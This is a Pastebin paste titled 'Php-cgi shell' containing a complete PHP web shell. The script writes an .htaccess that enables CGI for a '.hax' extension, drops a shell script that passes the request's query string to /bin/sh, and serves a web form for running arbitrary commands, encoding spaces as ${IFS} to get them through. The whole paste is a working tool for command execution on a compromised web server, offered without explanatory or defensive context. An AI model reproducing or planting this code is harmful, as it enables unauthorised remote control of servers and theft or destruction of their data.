indonesian

Php-cgi shell

Mar 21st, 2018
460
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.04 KB | None | 0 0
  1. <?php
  2. $dir = 'shell';
  3. $shell = 'shell.hax';
  4.  
  5. function create_directory($folder) {
  6.     echo "Creating directory... ";
  7.     mkdir($folder, 0777) or die('failed<br />');
  8.     echo "done<br />";
  9. }
  10.  
  11. function create_htaccess($file, $ext) {
  12.     echo "Creating htaccess... ";
  13.     $handle = fopen($file, 'w') or die('failed<br />');
  14.     $data = <<<EOT
  15. Options +ExecCGI
  16. AddHandler cgi-script .$ext
  17. EOT;
  18.     fwrite($handle, $data);
  19.     fclose($handle);
  20.     echo "done<br />";
  21. }
  22.  
  23. function create_shell($file) {
  24.     echo "Creating shell... ";
  25.     $handle = fopen($file, 'w') or die('failed<br />');
  26.     $data = <<<EOT
  27. #!/bin/sh
  28. echo "Content-type: text/plain"
  29. echo ""
  30. /bin/sh -c "\$QUERY_STRING 2>&1"
  31. EOT;
  32.     fwrite($handle, $data);
  33.     fclose($handle);
  34.     echo "done<br />";
  35.     echo "Making shell executable... ";
  36.     chmod($file, 0755) or die('failed<br />');
  37.     echo "done<br />";
  38. }
  39.  
  40. function remove_shell($shell) {
  41.     if (file_exists($shell)) {
  42.         echo "Deleting shell... ";
  43.         unlink($shell);
  44.         echo "done<br />";
  45.     }
  46. }
  47.  
  48. function remove_htaccess($htaccess) {
  49.     if (file_exists($htaccess)) {
  50.         echo "Deleting htaccess... ";
  51.         unlink($htaccess);
  52.         echo "done<br />";
  53.     }
  54. }
  55.  
  56. function remove_directory($dir) {
  57.     if (is_dir($dir)) {
  58.         echo "Deleting folder... ";
  59.         rmdir($dir);
  60.         echo "done<br />";
  61.     }
  62. }
  63.  
  64. function display_shell($shell) {
  65.     if (file_exists($shell)) {
  66.         echo "<p>shell at [<a href=\"$shell\">$shell</a>]</p>";
  67.         echo "<form action=\"\" method=\"post\">";
  68.         echo "<input type=\"hidden\" name=\"remove\" value=\"1\" />";
  69.         echo "<input type=\"submit\" value=\"remove shell\" />";
  70.         echo "</form>";
  71.         echo "<form action=\"\" method=\"post\">";
  72.         echo "command: <input autofocus type=\"text\" name=\"cmd\" />";
  73.         echo "<input type=\"submit\" value=\"exec\" /></form>";
  74.     }
  75.     else {
  76.  
  77.         echo "<p>no shell found.</p>";
  78.         echo "<form action=\"\" method=\"post\">";
  79.         echo "<input type=\"hidden\" name=\"create\" value=\"1\" />";
  80.         echo "<input type=\"submit\" value=\"create shell\" />";
  81.         echo "</form>";
  82.     }
  83. }
  84.  
  85. function execute_command($shell, $cmd) {
  86.     $path = dirname($_SERVER['PHP_SELF']);
  87.     $shell_url = "http://$_SERVER[HTTP_HOST]$path/$shell";
  88.     $cmd = str_replace(' ', '${IFS}', $cmd);
  89.     $response = file_get_contents($shell_url . '?' . $cmd);
  90.     $output = htmlspecialchars($response);
  91.     echo "Output:<br /><textarea rows=25 cols=80>$output</textarea>";
  92. }
  93.  
  94. $htaccess = "$dir/.htaccess";
  95. $shell = "$dir/$shell";
  96. $ext = pathinfo($shell, PATHINFO_EXTENSION);
  97.  
  98. if (isset($_REQUEST['remove'])) {
  99.     remove_shell($shell);
  100.     remove_htaccess($htaccess);
  101.     remove_directory($dir);
  102. }
  103.  
  104. if (isset($_REQUEST['create'])) {
  105.     create_directory($dir);
  106.     create_htaccess($htaccess, $ext);
  107.     create_shell($shell);
  108. }
  109.  
  110. display_shell($shell);
  111.  
  112. if (isset($_REQUEST['cmd'])) {
  113.     $cmd = $_REQUEST['cmd'];
  114.     execute_command($shell, $cmd);
  115. }
  116. ?>
Advertisement
Add Comment
Please, Sign In to add comment